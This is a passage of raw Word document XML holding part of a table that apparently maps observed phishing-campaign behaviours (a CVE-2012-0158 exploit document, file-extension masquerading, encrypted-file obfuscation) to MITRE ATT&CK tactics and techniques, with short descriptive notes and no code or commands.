          <w:p w14:paraId="43F9F74F" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67915EB9" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EEBD4EB" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485422EC" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ECC929F" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6921C443" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F732AC3" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103C4E50" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="002D1D50" w14:paraId="6F06A2C1" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162856CA" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249631C4" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30FFF064" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B5EB0B" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F06E01D" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D06738" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77148909" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DA193A" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="4FC7BB9C" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C9EBA66" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2061D7AA" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">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291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649B4AEE" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">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49" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349672D0" w14:textId="2275EC13" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00EC6D70" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ABF740D" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DD3CC12" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7148B4F7" w14:textId="593FE365" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D534D43" w14:textId="7D6F5FEB" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="004A4285" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E9236C">
              <w:t>The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w14:paraId="6F0C765E" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C8F3A8B" w14:textId="77777777" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC5C774" w14:textId="77777777" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="178188A2" w14:textId="48C0AB3C" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1036 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F635A02" w14:textId="20EE4F20" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0180F08C" w14:textId="77777777" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A98DAF7" w14:textId="77777777" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6D70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="651500BC" w14:textId="08B2C2A4" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="009C415E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71CA0AC7" w14:textId="45BFA398" w:rsidR="00EC6D70" w:rsidRPr="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC6D70">
              <w:t xml:space="preserve">The delivery document uses the XLSX extension typically used by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:t>OpenXML</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6D70">
              <w:t xml:space="preserve"> documents, but the file itself is actually an OLE (XLS) document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D624E" w:rsidRPr="00B857D7" w14:paraId="03989E5A" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA1A0C7" w14:textId="384BE342" w:rsidR="000D624E" w:rsidRDefault="004A4285" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A1D74C" w14:textId="581B57E8" w:rsidR="000D624E" w:rsidRPr="00B857D7" w:rsidRDefault="000D624E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79CD52C0" w14:textId="4235C5A8" w:rsidR="000D624E" w:rsidRPr="00B857D7" w:rsidRDefault="000D624E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D624E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54EC8F47" w14:textId="715E3745" w:rsidR="000D624E" w:rsidRDefault="00EC6D70" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="124176A1" w14:textId="77777777" w:rsidR="000D624E" w:rsidRPr="00B857D7" w:rsidRDefault="000D624E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7470BE2D" w14:textId="10FF8564" w:rsidR="000D624E" w:rsidRDefault="000D624E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="243CAD53" w14:textId="1980F0A4" w:rsidR="000D624E" w:rsidRPr="00B857D7" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D20F0F" w14:textId="74B541D9" w:rsidR="000D624E" w:rsidRPr="003930D6" w:rsidRDefault="000D624E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003930D6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>… which stores XLSX ciphertext and the information needed for decryption in an OLE document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="2EDCCF27" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C753952" w14:textId="6A19228D" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="004A4285" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
